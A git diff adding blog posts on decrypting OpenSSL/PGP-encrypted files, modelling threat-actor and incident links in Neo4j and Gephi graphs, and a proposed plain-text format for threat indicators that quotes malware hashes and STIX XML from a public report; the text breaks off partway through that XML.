|
if [ $decrypted != false ]; then
|
||||||
|
TEXTFILE_DEC=`printf %s "$TEXTFILE_ENC"|base64 -d|openssl enc -$ALGORITHM -d -K "$DECRYPTED_KEY" -iv "$IV" |base64`
|
||||||
|
break
|
||||||
|
fi
|
||||||
|
done
|
||||||
|
|
||||||
|
echo $TEXTFILE_DEC
|
||||||
|
```
|
||||||
|
|
||||||
|
The above format supports encryption to multiple parties. It:
|
||||||
|
|
||||||
|
1. Reads the PV-format into variables
|
||||||
|
2. Loops through the encryption blobs (one pass if one recipient)
|
||||||
|
3. Decrypts the key with the private key generated from `gpgsm`
|
||||||
|
4. Using the IV and decrypted key, decrypts the content, which is
|
||||||
|
eventually the same as in the previous section's `some-file`
|
||||||
|
5. Prints the decrypted content
|
||||||
|
|
||||||
|
## Conclusion
|
||||||
|
|
||||||
|
It is possible to convert PGP keys to use with OpenSSL via `gpgsm`.
|
||||||
|
|
||||||
|
Since OpenSSL is more widely distributed and installed than GnuPG,
|
||||||
|
it is a method applicable in more environments.
|
||||||
|
|
||||||
|
Using OpenSSL instead of GnuPG provides more options, and reduces
|
||||||
|
the complexity of cryptography (since GnuPG has lots of options).
|
||||||
|
|
||||||
|
[1] https://stackoverflow.com/questions/39412760/what-is-an-openssl-iv-and-why-do-i-need-a-key-and-an-iv
|
||||||
|
|
||||||
|
[2] https://superuser.com/a/1414277
|
103
data/graph-experiment.md
Normal file
103
data/graph-experiment.md
Normal file
|
@ -0,0 +1,103 @@
|
||||||
|
I currently maintain this threat database, and up until now I've
|
||||||
|
generated the graph data for d3 using queries, and a lot of logic,
|
||||||
|
in a MySQL-database. That is going to change pretty soon. You
|
||||||
|
might also remember when we did Social Network Analysis and Object
|
||||||
|
Attribution with Maltego 3 [1].
|
||||||
|
|
||||||
|
In my seeking for understanding the Apache Hadoop ecosystem I all
|
||||||
|
of a sudden got a brutal meeting with Java (Eclipse huh..). I also
|
||||||
|
discovered that there are a world of libraries and applications
|
||||||
|
previously unknown to me. One of them is the über-awesome Neo4j,
|
||||||
|
which is a graph database originally built for Java - but guess
|
||||||
|
what: It's got a REST API as well. As usual you don't have to
|
||||||
|
write the Python code yourself, someone already wrote it for
|
||||||
|
you. Note that it only does Python 2 for now [2,3].
|
||||||
|
|
||||||
|
The coolest thing about Neo4j is Cypher [5]: Cypher is a "graph
|
||||||
|
query language" as they put it themselves. With Cypher you can
|
||||||
|
express what you look for in an entirely other way than you would
|
||||||
|
do in a relational database, it's actually easy.
|
||||||
|
|
||||||
|
And: You of course need the database running as well. If you use a
|
||||||
|
Debian system like me your in luck since they have an experimental
|
||||||
|
version out there [5].
|
||||||
|
|
||||||
|
Enough talk, here is a simple example of how you could go about it
|
||||||
|
in regard to scripting the relations considering threat
|
||||||
|
intelligence in order to connect groups to incidents. The goal
|
||||||
|
would be to find peripherally connected groups.
|
||||||
|
|
||||||
|
from GraphConn.Connect import Graph
|
||||||
|
g = Graph()
|
||||||
|
|
||||||
|
# create groups
|
||||||
|
g.cGroup("ThreatA")
|
||||||
|
g.cGroup("ThreatB")
|
||||||
|
g.cGroup("ThreatC")
|
||||||
|
|
||||||
|
# create incidents
|
||||||
|
g.cIncident("IncA")
|
||||||
|
g.cIncident("IncB")
|
||||||
|
g.cIncident("IncC")
|
||||||
|
|
||||||
|
# relate groups in some way to each other through incidents
|
||||||
|
g.link("ThreatA","IncA")
|
||||||
|
g.link("ThreatA","IncB")
|
||||||
|
g.link("ThreatB","IncC")
|
||||||
|
g.link("ThreatC","IncA")
|
||||||
|
g.link("ThreatB","IncB")
|
||||||
|
|
||||||
|
# find all threats related to Threat A through incidents
|
||||||
|
print g.fRelated("ThreatA")
|
||||||
|
|
||||||
|
You might find this simple, but if you've ever tried to do it in
|
||||||
|
SQL you know why you'll need it. Also, remember that this scales
|
||||||
|
indefinite to other entity types as well.
|
||||||
|
|
||||||
|
Here's the class used to generate the graph, for reference (feel
|
||||||
|
free to copy it, produce something cool and post it back in the
|
||||||
|
comment field):
|
||||||
|
|
||||||
|
from neo4jrestclient import client
|
||||||
|
from neo4jrestclient.client import GraphDatabase
|
||||||
|
from neo4jrestclient.query import Q
|
||||||
|
|
||||||
|
class Graph:
|
||||||
|
def __init__(self):
|
||||||
|
self.gdb = GraphDatabase("http://localhost:7474/db/data/")
|
||||||
|
self.nodes = []
|
||||||
|
|
||||||
|
def cGroup(self,name):
|
||||||
|
n = self.gdb.nodes.create(name=name, type='Group')
|
||||||
|
self.nodes.append(n)
|
||||||
|
|
||||||
|
def cIncident(self,name):
|
||||||
|
n = self.gdb.nodes.create(name=name, type='Incident')
|
||||||
|
self.nodes.append(n)
|
||||||
|
|
||||||
|
def link(self,n1,n2):
|
||||||
|
try:
|
||||||
|
l = (Q("name", iexact=n1)); n1 = self.gdb.nodes.filter(l)[0];
|
||||||
|
l = (Q("name", iexact=n2)); n2 = self.gdb.nodes.filter(l)[0];
|
||||||
|
return n1.relationships.create("Executed", n2)
|
||||||
|
except:
|
||||||
|
return False
|
||||||
|
|
||||||
|
def fRelated(self,query):
|
||||||
|
l = (Q("name", iexact=query))
|
||||||
|
n = self.gdb.nodes.filter(l)[0]
|
||||||
|
r = n.traverse()
|
||||||
|
for n2 in r:
|
||||||
|
for e in n2.traverse():
|
||||||
|
r.append(e)
|
||||||
|
return list(r)
|
||||||
|
|
||||||
|
I really hope you enjoy this as much as me right now. The Facebook
|
||||||
|
Graph Search for the rest of us.
|
||||||
|
|
||||||
|
|
||||||
|
[1] gopher://secdiary.com/0/post/sna-oa-maltego/index.txt
|
||||||
|
[2] https://pypi.python.org/pypi/neo4jrestclient/
|
||||||
|
[3] https://neo4j-rest-client.readthedocs.org/en/latest/elements.html
|
||||||
|
[4] http://www.neo4j.org/learn/cypher
|
||||||
|
[5] http://debian.neo4j.org/
|
82
data/graphs-scale.md
Normal file
82
data/graphs-scale.md
Normal file
|
@ -0,0 +1,82 @@
|
||||||
|
Following up on my post yesterday, I have also been looking at
|
||||||
|
graphs the other way - from a scalable database to a manageable
|
||||||
|
graph involving e.g. just one segment.
|
||||||
|
|
||||||
|
There are currently two ways to do this:
|
||||||
|
|
||||||
|
1) Export the graph, and 2) streaming the graph from and to the
|
||||||
|
graph database. The first option is obviously the simple one, but
|
||||||
|
doesn't always make up for our needs. The latter option is often
|
||||||
|
the case when you work multiple analysts at the same graph.
|
||||||
|
|
||||||
|
|
||||||
|
## Option 1: Exporting the Graph
|
||||||
|
|
||||||
|
To achieve the first you can use the GraphML save function of
|
||||||
|
Gremlin.
|
||||||
|
|
||||||
|
conf = new BaseConfiguration();
|
||||||
|
conf.setProperty("storage.backend","hbase");
|
||||||
|
conf.setProperty("storage.hostname","sandbox.hortonworks.com");
|
||||||
|
conf.setProperty("storage.port","2181");
|
||||||
|
g = TitanFactory.open(conf);
|
||||||
|
g.saveGraphML('test.graphml')
|
||||||
|
|
||||||
|
This graph can again be opened in tools such as Gephi.
|
||||||
|
|
||||||
|
You can also use the Gephi database API plugin for
|
||||||
|
Rexster. There's a Blueprints repo [1] which extends that. Short
|
||||||
|
how-to on how to get going with the Gephi development environment,
|
||||||
|
from the wiki-pages of the plugin [2]:
|
||||||
|
|
||||||
|
1. Get plugins from [3], and [4]
|
||||||
|
2. Open Gephi, go to ``Tools > Plugins > Downloaded > "Add
|
||||||
|
Plugins..."``
|
||||||
|
3. Press install and follow the guidance, at the end you should
|
||||||
|
restart Gephi
|
||||||
|
4. Go to File > Import Database
|
||||||
|
5. Add the Rexster configuration to ``/etc/graph/rexster.xml`` (if
|
||||||
|
when importing the database issues arises, look at [5]
|
||||||
|
|
||||||
|
``rexster.xml`` should look like this:
|
||||||
|
|
||||||
|
<graph>
|
||||||
|
<graph-name>RexterGraph</graph-name>
|
||||||
|
<graph-type>com.tinkerpop.rexster.config.RexsterGraphGraphConfiguration</graph-type>
|
||||||
|
<graph-buffer-size>100</graph-buffer-size>
|
||||||
|
<graph-location>http://192.168.109.128:8182/graphs/titan</graph-location>
|
||||||
|
</graph>
|
||||||
|
|
||||||
|
You should be left with something like this for instance in Gephi:
|
||||||
|
|
||||||
|
![A Rexster Graph Import to Gephi, from a Titan database. The graph consists of a variety of segments, such as articles from a article-system and imported Maltego graphs](/static/img/data/rexster-import-gephi.png)
|
||||||
|
|
||||||
|
A Rexster Graph Import to Gephi, from a Titan database. The graph
|
||||||
|
consists of a variety of segments, such as articles, imported
|
||||||
|
Maltego graphs and such.
|
||||||
|
|
||||||
|
A Rexster Graph Import to Gephi, from a Titan database. The graph
|
||||||
|
consists of a variety of segments, such as articles from a
|
||||||
|
article-system and imported Maltego graphs
|
||||||
|
|
||||||
|
Here's the cluster on the right there by the way. There's some
|
||||||
|
interesting patterns inside there it seems, so I suspect it's from
|
||||||
|
a Maltego graph:
|
||||||
|
|
||||||
|
![](/static/img/data/gephi-cluster-maltego.png)
|
||||||
|
|
||||||
|
## Option 2: The Gephi Streaming API
|
||||||
|
|
||||||
|
For the other option I found the Gephi graph streaming API
|
||||||
|
[6]. This one I currently found a little limited in that it can
|
||||||
|
only provide collaboration between two Gephi instances using a
|
||||||
|
Jetty web-server. It's pretty cool, but doesn't offer the
|
||||||
|
integration I am looking for. I'll get back to this later.
|
||||||
|
|
||||||
|
[1] https://github.com/datablend/gephi-blueprints-plugin
|
||||||
|
[2] https://github.com/datablend/gephi-blueprints-plugin/wiki
|
||||||
|
[3] https://github.com/downloads/datablend/gephi-blueprints-plugin/org-gephi-lib-blueprints.nbm
|
||||||
|
[4]
|
||||||
|
https://github.com/downloads/datablend/gephi-blueprints-plugin/org-gephi-blueprints-plugin.nbm
|
||||||
|
[5] https://github.com/datablend/gephi-blueprints-plugin/issues/1
|
||||||
|
[6] https://marketplace.gephi.org/plugin/graph-streaming/
|
463
data/indicators.md
Normal file
463
data/indicators.md
Normal file
|
@ -0,0 +1,463 @@
|
||||||
|
Over what have become some years, cyber security
|
||||||
|
professionals have been working on optimising the sharing of
|
||||||
|
information and knowledge. A lot of the efforts have
|
||||||
|
recently been focused around intelligence- and data-driven
|
||||||
|
teams. Today many of these discussions have ended evolving
|
||||||
|
around something related to the STIX format.
|
||||||
|
|
||||||
|
> Don't use a lot where a little will do
|
||||||
|
> – Unknown origin
|
||||||
|
|
||||||
|
This post features a perspective of the potential of today's
|
||||||
|
standard-oriented approach for documenting indicator sets
|
||||||
|
related to cyber security threat actors and incidents. It
|
||||||
|
turns out we have a longer way to go than expected.
|
||||||
|
|
||||||
|
For the purpose of this article, an indicator is a
|
||||||
|
characteristic or evidence of something unwanted, or hostile
|
||||||
|
if you'd like. I like to refer to the military term
|
||||||
|
"Indicators & Warnings" in this regard. In other words, an
|
||||||
|
indicator isn't necessarily limited to the cyber domain
|
||||||
|
alone either. Physical security could be in an even worse
|
||||||
|
condition than cyber security when it comes to expressing
|
||||||
|
threat indicators. I'll leave the cross-domain discussion
|
||||||
|
for another time.
|
||||||
|
|
||||||
|
## Up Until Today
|
||||||
|
|
||||||
|
Multiple standards have evolved and disappeared, and one
|
||||||
|
that I have been in favor of previously is the OpenIOC 1.1
|
||||||
|
standard. However, times are changing, and so are the
|
||||||
|
terminology and breadth of how we are able to express the
|
||||||
|
intrusion sets.
|
||||||
|
|
||||||
|
Even though OpenIOC was a very good start, and still is as
|
||||||
|
far as I am concerned, it has far been surpassed Cybox and
|
||||||
|
ultimately STIX [1] in popularity.
|
||||||
|
|
||||||
|
STIX is a container, a quite verbose XML format (which is
|
||||||
|
turning JSON in 2.0). Cybox is the artefact format [2], for
|
||||||
|
malware you have MAEC [3] and so on. Basically it's a set of
|
||||||
|
projects collaborating.
|
||||||
|
|
||||||
|
This all sounds good, right? Not quite. Have a look at the
|
||||||
|
OpenIOC to STIX repository on Github [4] and you will find
|
||||||
|
that ``stuxnet.stix.xml`` is 202 lines of XML code for 18
|
||||||
|
atomic indicators. OpenIOC on the other hand, is 91 lines,
|
||||||
|
and that is a verbose format as well. In fact the overhead
|
||||||
|
ratio of the STIX file is about 10:1, while OpenIOC is about
|
||||||
|
5:1.
|
||||||
|
|
||||||
|
To add to the mind-blowing inefficiency I have yet to see,
|
||||||
|
on a regular basis, complex and nested expressions of an
|
||||||
|
actor or a campaign in the STIX format.
|
||||||
|
|
||||||
|
Before you continue, do a simple Google search for "STIX
|
||||||
|
editor" and "cybox editor". Do it now, and while you are at
|
||||||
|
it google for "openioc editor" as well. Hello guys, these
|
||||||
|
standards have been going around for many years. So, how
|
||||||
|
should we interpret that there aren't any user friendly
|
||||||
|
approaches to using them? The closest I've come is through
|
||||||
|
MISP, and that is generally speaking not using these
|
||||||
|
standards for their internal workings either. This one on
|
||||||
|
the MISP GitHub issue tracker says it all: STIX 2.x support
|
||||||
|
(MISP) [5].
|
||||||
|
|
||||||
|
I'm sure that some may disagree with the above statements,
|
||||||
|
calling out the infancy of these formats. However, they
|
||||||
|
can't be said to be new standards anymore. They are just too
|
||||||
|
complex. One example of such is the graph-oriented relations
|
||||||
|
implemented into the formats. Why not just let a graph
|
||||||
|
database take care of these instead?
|
||||||
|
|
||||||
|
This is not just a post to establish the current state. How
|
||||||
|
would a better approach look?
|
||||||
|
|
||||||
|
## What Is The Problem to Be Solved?
|
||||||
|
|
||||||
|
Back to where things have gone since the OpenIOC 1.1/atomic
|
||||||
|
indicator days. The most promising addition, in my opinion,
|
||||||
|
is the MITRE PRE-ATT&CK and ATT&CK frameworks. The two
|
||||||
|
frameworks builds on a less structured approach than seen
|
||||||
|
for atomic indicators (Lockheed's Kill-Chain). The latter
|
||||||
|
can for instance be viewed in form of the Intelligence
|
||||||
|
Pyramid.
|
||||||
|
|
||||||
|
The Intelligence Pyramid's abstraction levels can be mapped
|
||||||
|
against what it is supposed to support when it comes to
|
||||||
|
indicators like the following:
|
||||||
|
|
||||||
|
| Level of abstraction | | Supports
|
||||||
|
|-----------------------|----|-------------
|
||||||
|
| Behavior | | Knowledge
|
||||||
|
|-----------------------|--->|-------------
|
||||||
|
| Derived | | Information
|
||||||
|
|-----------------------|--->|-------------
|
||||||
|
| Atomic | | Data
|
||||||
|
|
||||||
|
The purpose of the abstration layer is in this case to
|
||||||
|
support assessments and measures at the corresponding
|
||||||
|
contextual level. For instance a technical report tailored
|
||||||
|
to an Incident Response Team (IRT) generally concerns
|
||||||
|
Derived and Atomic indicators, while an intelligence report
|
||||||
|
would usually be based on the Behavioural level.
|
||||||
|
|
||||||
|
Having covered the abstraction layers, we can recognize that
|
||||||
|
OpenIOC (or Cybox and MAEC) covers the bottom layers of
|
||||||
|
abstration, while MITRE (PRE-)ATT&CK in its current form is
|
||||||
|
mostly about the Behaviour level.
|
||||||
|
|
||||||
|
For Derived indicators there are primarily two
|
||||||
|
well-established, seasoned and successful formats that have
|
||||||
|
become standards through its widespread usage. This is
|
||||||
|
amongst others caused by the indicators and rules being
|
||||||
|
effective, rapid, easy and pleasing to write.
|
||||||
|
|
||||||
|
First we have Snort/Suricata rules and Lua scripts which was
|
||||||
|
designed for network detection. For Snort/Suricata I'd say
|
||||||
|
that most of what is detected of metadata today is probably
|
||||||
|
expressable in OpenIOC (except for the magic that can be
|
||||||
|
done with Lua). Second there is the Yara format which has
|
||||||
|
become known for its applicability against malicious
|
||||||
|
files. The simplicity of both formats is obviously due to
|
||||||
|
their power of expression. Thus, I'd say that Yara and
|
||||||
|
Snort/Suricata formats is the ones to look for when it comes
|
||||||
|
to content and pattern detection.
|
||||||
|
|
||||||
|
> Indicators should be easy and pleasing to write.
|
||||||
|
|
||||||
|
To summarize the above, each of the formats can be mapped to
|
||||||
|
an abstraction level:
|
||||||
|
|
||||||
|
| Level of abstraction | | Formats
|
||||||
|
|-----------------------|----|-------------
|
||||||
|
| Behavior | | MITRE (PRE-)ATT&CK
|
||||||
|
|-----------------------|--->|-------------
|
||||||
|
| Derived | | Suricata+Lua, Yara
|
||||||
|
|-----------------------|--->|-------------
|
||||||
|
| Atomic | | OpenIOC 1.1
|
||||||
|
|
||||||
|
|
||||||
|
Going through my notes on how I document my own indicators I
|
||||||
|
also found that I use the CVE database, datetimes,
|
||||||
|
confidence, analyst comments for context and classification
|
||||||
|
as well (the latter being irrelevant for detection).
|
||||||
|
|
||||||
|
One of the major problems is: everything that is currently
|
||||||
|
out there breaks the analyst workflow. You either need to
|
||||||
|
log in to some fancy web interface, edit XML files (god
|
||||||
|
forbid) or you would just jot down everything in a text
|
||||||
|
file. The text file seems to be the natural fallback in
|
||||||
|
almost any instance. I have even attempted to use the very
|
||||||
|
good initiative by Yahoo, PyIOCe, and Mandiant's
|
||||||
|
long-forgotten IOC Editor. These projects have both lost
|
||||||
|
tracktion, as almost every other intiative in this space. So
|
||||||
|
that is right folks, the text editor is still the preferred
|
||||||
|
tool in 2018, and let's face it: indicators should be
|
||||||
|
pleasing to design and create - like putting your signature
|
||||||
|
to an incident or a job well done.
|
||||||
|
|
||||||
|
> an indicator set should be for humans and machines by
|
||||||
|
humans
|
||||||
|
|
||||||
|
After all, the human is the one that is going to have to
|
||||||
|
deal with the indicator sets at some point, and we are the
|
||||||
|
slowest link. So let us not slow ourselves down more than
|
||||||
|
necessary. At this point I would like to propose the golden
|
||||||
|
rule of creating golden rules: an indicator set should be
|
||||||
|
for humans and machines by humans.
|
||||||
|
|
||||||
|
You may also have noticed that when all these standards
|
||||||
|
suddendly are combined into one standard, they become less
|
||||||
|
user-friendly. In other words, let us rather find back to
|
||||||
|
our common \*NIX roots where each tool had a limited set of
|
||||||
|
tasks.
|
||||||
|
|
||||||
|
Graphs are essential when writing indicators. Almost
|
||||||
|
everything in the world around us can be modelled as a
|
||||||
|
network, and infiltration and persistence in cyberspace is
|
||||||
|
no exception. Thus, an indicator format needs to be
|
||||||
|
representable in a graph, and guess what? Almost everything
|
||||||
|
are as long as it maintains some kind of structure.
|
||||||
|
|
||||||
|
For graphs there are two ways of going about the problem:
|
||||||
|
|
||||||
|
1) Implement the graph in the format
|
||||||
|
|
||||||
|
2) Make sure that you have a good graph backend and a
|
||||||
|
automatable and traversable format available
|
||||||
|
|
||||||
|
For option 1, the graph in the format will increase the
|
||||||
|
complexity significantly. Option 2 results in the opposite,
|
||||||
|
but that does not mean that it can't be converted to a
|
||||||
|
graph. To make an elaborate discussion short, this is what
|
||||||
|
we have graph databases for, such as Janusgraph [6].
|
||||||
|
|
||||||
|
|
||||||
|
## A Conceptual View
|
||||||
|
|
||||||
|
Summarizing the above, I'd like to propose the following
|
||||||
|
requirements for indicator formats:
|
||||||
|
|
||||||
|
1) Indicator sets should be easy and inviting to create
|
||||||
|
|
||||||
|
2) You should be able to start writing at any time, when you
|
||||||
|
need it
|
||||||
|
|
||||||
|
3) Unnecessary complexity should be avoided
|
||||||
|
|
||||||
|
4) The format should be human readable and editable
|
||||||
|
|
||||||
|
5) A machine should be able to interpret the format
|
||||||
|
|
||||||
|
6) Indicator sets should be graph compatible
|
||||||
|
|
||||||
|
With a basis in this article, I believe that the best
|
||||||
|
approach is to provide a basic plain text format
|
||||||
|
specification that inherits from the OpenIOC 1.1 and MITRE
|
||||||
|
frameworks and references other formats where necessary.
|
||||||
|
|
||||||
|
Let us imagine that we found an IP address in one
|
||||||
|
situation. The IP-address was connected to a domain that we
|
||||||
|
found using passive DNS. Further, it was found that a
|
||||||
|
specific file was associated with that domain through a
|
||||||
|
Twitter comment. Representing the given information in its
|
||||||
|
purest (readable) form looks like the following:
|
||||||
|
|
||||||
|
// a test file
|
||||||
|
class tlp:white
|
||||||
|
date 2018/02/18
|
||||||
|
ipv4 low 188.226.130.166
|
||||||
|
domain med secdiary.com
|
||||||
|
technique PRE-T1146
|
||||||
|
filename med some_filename.docx
|
||||||
|
comment found in open sources
|
||||||
|
|
||||||
|
To recap some of the previous points: the above format is
|
||||||
|
simple, it can be written at any time based on knowledge of
|
||||||
|
well known standards. The best of it all is that if you are
|
||||||
|
heavily invested in specific formats, it can be converted to
|
||||||
|
them all using a simple interpreter traversing the format.
|
||||||
|
|
||||||
|
Further, such a format is easily converted into a tree and
|
||||||
|
can be loaded into a graph for traversing and automated
|
||||||
|
assessments. Each confidence value can be quantified
|
||||||
|
(``low=0.33``, ``med=0.66``, ``high=1.0``). That said,
|
||||||
|
simplicity in this case equals actionable indicators.
|
||||||
|
|
||||||
|
| v: 188.226.130.166 (0.33) | match |
|
||||||
|
| e | |
|
||||||
|
| v: secdiary.com (0.66) | no match | (0.33+0.66)/2=0.5
|
||||||
|
| e | |
|
||||||
|
| v: some_filename.docx (0.66) | match |
|
||||||
|
|
||||||
|
For networks vs hierarchies: a drawback of the latter, as
|
||||||
|
mentioned in the former section, is the lack of
|
||||||
|
e.g. multiple domains being connected to different other
|
||||||
|
vertices. A practical solution goes as follows:
|
||||||
|
|
||||||
|
ipv4 low 188.226.130.166
|
||||||
|
domain med secdiary.com
|
||||||
|
domain low secdiary.com
|
||||||
|
ipv4 low 128.199.56.232
|
||||||
|
|
||||||
|
The graph receiving the above indicator file should identify
|
||||||
|
the domain as being a unique entity and link the two IP
|
||||||
|
addresses to the same domain:
|
||||||
|
|
||||||
|
| v: 188.226.130.166 (0.33)
|
||||||
|
| e: 0.5
|
||||||
|
| v: secdiary.com (0.5)
|
||||||
|
| e: 0.33
|
||||||
|
| v: 128.199.56.232 (0.33)
|
||||||
|
|
||||||
|
As for structuring the indicator format for machines in the
|
||||||
|
practical aspect, consider the following pseudocode:
|
||||||
|
|
||||||
|
indicators = [(0,'ipv4','low','188.226.130.166'),...]
|
||||||
|
_tree = tree(root_node)
|
||||||
|
for indicator in indicators
|
||||||
|
depth = indicator[0]
|
||||||
|
_tree.insert(indicator,depth)
|
||||||
|
|
||||||
|
Now that we have the tree represented in code, it is
|
||||||
|
trivially traversable when loading it into some graph:
|
||||||
|
|
||||||
|
method load_indicators(node,depth):
|
||||||
|
graph.insert(node.parent,edge_label,node)
|
||||||
|
for child in node.children
|
||||||
|
load_indicator(child,depth+1)
|
||||||
|
|
||||||
|
load_indicators(tree,0)
|
||||||
|
|
||||||
|
## Summary
|
||||||
|
|
||||||
|
Hopefully I did not kill too many kittens with this
|
||||||
|
post. You may or may not agree, but I do believe that most
|
||||||
|
analysts share at least parts of my purist views on the
|
||||||
|
matter.
|
||||||
|
|
||||||
|
We are currently too focused on supporting standards and
|
||||||
|
having everyone use as few of them as possible. I believe
|
||||||
|
that energy is better used on getting more consistent in the
|
||||||
|
way we document and actually exchange more developed
|
||||||
|
indicator sets than the md5 hash- and domainlists that are
|
||||||
|
typically shared today ("not looking at these kinds of files
|
||||||
|
at all" - even though it's not the worst I've seen:
|
||||||
|
``MAR-10135536-F_WHITE_stix.xml`` [7]).
|
||||||
|
|
||||||
|
In the conceptual part of this article I propose a simple
|
||||||
|
but yet effective way of representing indicators in a
|
||||||
|
practical manner. Frankly, it is even too simple to be
|
||||||
|
novel. It is just consistent and intutitive.
|
||||||
|
|
||||||
|
PS! For the STIX example above, have a look at the following
|
||||||
|
to get a feel with the actual content of the file (used one
|
||||||
|
of the mentioned specimens to show the point):
|
||||||
|
|
||||||
|
class tlp:white
|
||||||
|
date 2018/02/05
|
||||||
|
|
||||||
|
sha1 high 4efb9c09d7bffb2f64fc6fe2519ea85378756195
|
||||||
|
comment NCCIC:Observable-724f9bfe-1392-456e-8d9b-c143af15f8d4
|
||||||
|
comment did not convert all attributes
|
||||||
|
compiler Microsoft Visual C++ 6.0
|
||||||
|
md5 high 3dae0dc356c2b217a452b477c4b1db06
|
||||||
|
date 2016-01-29T09:21:46Z
|
||||||
|
entropy med 6.65226708818
|
||||||
|
#sections low 5
|
||||||
|
intname med ProxyDll.dll
|
||||||
|
detection med symantec:Heur.AdvML.B
|
||||||
|
|
||||||
|
The original document states for those same indicators in no less than 119 lines
|
||||||
|
with an overhead ratio of about 1:5 (it looks completely insane):
|
||||||
|
|
||||||
|
<stix:Observables cybox_major_version="2" cybox_minor_version="1" cybox_update_version="0">
|
||||||
|
<cybox:Observable id="NCCIC:Observable-724f9bfe-1392-456e-8d9b-c143af15f8d4">
|
||||||
|
<cybox:Object id="NCCIC:WinExecutableFile-bb9e38d1-d91c-4727-ab6a-514ecc0c02a2">
|
||||||
|
<cybox:Properties xsi:type="WinExecutableFileObj:WindowsExecutableFileObjectType">
|
||||||
|
<FileObj:File_Name>3DAE0DC356C2B217A452B477C4B1DB06</FileObj:File_Name>
|
||||||
|
<FileObj:Size_In_Bytes>336073</FileObj:Size_In_Bytes>
|
||||||
|
<FileObj:File_Format>PE32 executable (DLL) (console) Intel 80386, for MS Windows</FileObj:File_Format>
|
||||||
|
<FileObj:Hashes>
|
||||||
|
<cyboxCommon:Hash>
|
||||||
|
<cyboxCommon:Type xsi:type="cyboxVocabs:HashNameVocab-1.0">MD5</cyboxCommon:Type>
|
||||||
|
<cyboxCommon:Simple_Hash_Value>3dae0dc356c2b217a452b477c4b1db06</cyboxCommon:Simple_Hash_Value>
|
||||||
|
</cyboxCommon:Hash>
|
||||||
|
<cyboxCommon:Hash>
|
||||||
|
<cyboxCommon:Type xsi:type="cyboxVocabs:HashNameVocab-1.0">SHA1</cyboxCommon:Type>
|
||||||
|
<cyboxCommon:Simple_Hash_Value>4efb9c09d7bffb2f64fc6fe2519ea85378756195</cyboxCommon:Simple_Hash_Value>
|
||||||
|
</cyboxCommon:Hash>
|
||||||
|
<cyboxCommon:Hash>
|
||||||
|
<cyboxCommon:Type xsi:type="cyboxVocabs:HashNameVocab-1.0">SHA256</cyboxCommon:Type>
|
||||||
|
<cyboxCommon:Simple_Hash_Value>8acfe8ba294ebb81402f37aa094cca8f914792b9171bc62e758a3bbefafb6e02</cyboxCommon:Simple_Hash_Value>
|
||||||
|
</cyboxCommon:Hash>
|
||||||
|
<cyboxCommon:Hash>
|
||||||
|
<cyboxCommon:Type xsi:type="cyboxVocabs:HashNameVocab-1.0">SHA512</cyboxCommon:Type>
|
||||||
|
<cyboxCommon:Simple_Hash_Value>e52b8878bd8c3bdd28d696470cba8a18dcc5a6d234169e26a2fbd9862b10ec1d40196fac981bc3c5a67e661cd60c10036321388e5e5c1f60a7e9937dd71fadb1</cyboxCommon:Simple_Hash_Value>
|
||||||
|
</cyboxCommon:Hash>
|
||||||
|
<cyboxCommon:Hash>
|
||||||
|
<cyboxCommon:Type xsi:type="cyboxVocabs:HashNameVocab-1.0">SSDEEP</cyboxCommon:Type>
|
||||||
|
<cyboxCommon:Simple_Hash_Value>3072:jUdidTaC07zIQt9xSx1pYxHvQY06emquSYttxlxep0xnC:jyi1XCzcbpYdvQ2e9g3kp01C</cyboxCommon:Simple_Hash_Value>
|
||||||
|
</cyboxCommon:Hash>
|
||||||
|
</FileObj:Hashes>
|
||||||
|
<FileObj:Packer_List>
|
||||||
|
<FileObj:Packer>
|
||||||
|
<FileObj:Name>Microsoft Visual C++ 6.0</FileObj:Name>
|
||||||
|
</FileObj:Packer>
|
||||||
|
<FileObj:Packer>
|
||||||
|
<FileObj:Name>Microsoft Visual C++ 6.0 DLL (Debug)</FileObj:Name>
|
||||||
|
</FileObj:Packer>
|
||||||
|
</FileObj:Packer_List>
|
||||||
|
<FileObj:Peak_Entropy>6.65226708818</FileObj:Peak_Entropy>
|
||||||
|
<WinExecutableFileObj:Headers>
|
||||||
|
<WinExecutableFileObj:File_Header>
|
||||||
|
<WinExecutableFileObj:Number_Of_Sections>5</WinExecutableFileObj:Number_Of_Sections>
|
||||||
|
<WinExecutableFileObj:Time_Date_Stamp>2016-01-29T09:21:46Z</WinExecutableFileObj:Time_Date_Stamp>
|
||||||
|
<WinExecutableFileObj:Size_Of_Optional_Header>4096</WinExecutableFileObj:Size_Of_Optional_Header>
|
||||||
|
<WinExecutableFileObj:Hashes>
|
||||||
|
<cyboxCommon:Hash>
|
||||||
|
<cyboxCommon:Type xsi:type="cyboxVocabs:HashNameVocab-1.0">MD5</cyboxCommon:Type>
|
||||||
|
<cyboxCommon:Simple_Hash_Value>e14dca360e273ca75c52a4446cd39897</cyboxCommon:Simple_Hash_Value>
|
||||||
|
</cyboxCommon:Hash>
|
||||||
|
</WinExecutableFileObj:Hashes>
|
||||||
|
</WinExecutableFileObj:File_Header>
|
||||||
|
<WinExecutableFileObj:Entropy>
|
||||||
|
<WinExecutableFileObj:Value>0.672591739631</WinExecutableFileObj:Value>
|
||||||
|
</WinExecutableFileObj:Entropy>
|
||||||
|
</WinExecutableFileObj:Headers>
|
||||||
|
<WinExecutableFileObj:Sections>
|
||||||
|
<WinExecutableFileObj:Section>
|
||||||
|
<WinExecutableFileObj:Section_Header>
|
||||||
|
<WinExecutableFileObj:Name>.text</WinExecutableFileObj:Name>
|
||||||
|
<WinExecutableFileObj:Size_Of_Raw_Data>49152</WinExecutableFileObj:Size_Of_Raw_Data>
|
||||||
|
</WinExecutableFileObj:Section_Header>
|
||||||
|
<WinExecutableFileObj:Entropy>
|
||||||
|
<WinExecutableFileObj:Value>6.41338619924</WinExecutableFileObj:Value>
|
||||||
|
</WinExecutableFileObj:Entropy>
|
||||||
|
<WinExecutableFileObj:Header_Hashes>
|
||||||
|
<cyboxCommon:Hash>
|
||||||
|
<cyboxCommon:Type xsi:type="cyboxVocabs:HashNameVocab-1.0">MD5</cyboxCommon:Type>
|
||||||
|
<cyboxCommon:Simple_Hash_Value>076cdf2a2c0b721f0259de10578505a1</cyboxCommon:Simple_Hash_Value>
|
||||||
|
</cyboxCommon:Hash>
|
||||||
|
</WinExecutableFileObj:Header_Hashes>
|
||||||
|
</WinExecutableFileObj:Section>
|
||||||
|
<WinExecutableFileObj:Section>
|
||||||
|
<WinExecutableFileObj:Section_Header>
|
||||||
|
<WinExecutableFileObj:Name>.rdata</WinExecutableFileObj:Name>
|
||||||
|
